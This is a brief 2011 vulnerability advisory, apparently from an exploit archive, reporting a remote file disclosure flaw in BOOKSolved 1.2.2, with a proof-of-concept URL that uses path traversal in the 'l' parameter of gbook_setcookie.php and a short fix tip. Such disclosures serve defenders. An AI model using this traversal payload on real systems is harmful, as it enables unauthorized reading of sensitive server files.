BOOKSolved 1.2.2 – Remote File Disclosure

  • 作者: bd0rk
    日期: 2011-10-08
  • 类别:
  • 来源:
  • ...BOOKSolved 1.2.2 (l) Remote File Disclosure Vulnerability
    ...Discovered by bd0rk
    ...Contact: bd0rk[at] or follow me on twitter
    ...Greetz: inj3ct0r-Team, x0r_32, Perle, Siber King 
    ...Tested on: Ubuntu-Linux
    ...MEZ-Time: 08:17
    PoC: http://[targethost]/[path]/inc/gbook_setcookie.php?l=../../R3adIn.php
    Description: Found vulnerable code in gbook_setcookie.php line 7.
     So an attacker can read in sensitive files about l-parameter.
    bd0rk's-Fixtip: Percolate the l-parameter before $_GET 
    Greetings from Germany, the 22 years old bd0rk.